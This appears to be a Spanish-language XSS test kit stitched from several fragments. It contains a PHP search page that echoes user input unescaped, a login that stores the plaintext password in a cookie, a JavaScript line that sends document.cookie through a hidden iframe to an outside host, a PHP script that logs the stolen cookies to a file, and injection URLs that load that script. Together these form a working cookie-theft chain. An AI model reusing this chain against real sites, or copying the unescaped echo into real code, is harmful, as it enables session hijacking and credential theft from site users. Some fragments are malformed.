<?php
session_start();
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Bienvenidos a XSS testing</title>
</head>
   
<body><center>
<h1><font color=red>XSS Testing</font></h1></center>
<div align=center>
<form method="post" action="busca.php" >
<input type="text" name="busca" value="Buscador Vulnerable" maxlength="222">
<input type="submit" value="buscar">
</form>
</div>
<br><br><br>
<form method="post" action="pag2.php">
<font color=red>Ingrese su usuario:    <input type="text" name="nombre">
<br>
Ingrese su contraseña: </font><input type="password" name="password">
<br>
<input type="submit" value="enviar">
</form>
</body>
</html>

<?php
$bus = $_REQUEST['busca'];

echo ($bus);
?>

<?php
$user=$_POST['nombre'];
$pass = $_POST['password'];
if ($user == "franco"  && $pass == "franco")
{
setcookie("senia", $user."-". $pass, time()+60*60*24*365, "/");
echo "Bienvenido $user";
}
else
{
echo "usuario o contraseña incorrcto:";
}
?>

document.write("<iframe width='0' height='0' src='http://www.pruebas18p.webcindario.com/cookie.php?c="+document.cookie+"'></iframe>");

<?php
$cookie=$_GET['c'];
$file=fopen('archivo.txt', 'a');
fwrite($file, $cookie.' - ');
fclose($file);
?>

<script src=\"http://www.pruebas18p.webcindario.com/cookie.js\"</script>
<!-- Inserted by miarroba -->
<script type="text/javascript" src="http://weborama.miarroba.info/?d=hosting&amp;h=pruebas18p.webcindario.com&amp;t=1280371273&amp;k=5c4e108c6ef14544954ee758c7790aa0"></script>
<!-- Inserted by miarroba -->

<script src=\"http://www.pruebas18p.webcindario.com/cookie.js\"></script>

http://www.pruebas18p/busca.php?busca=<script src="http://www.pruebas18p/cookie.js"</script>

<bHola</b>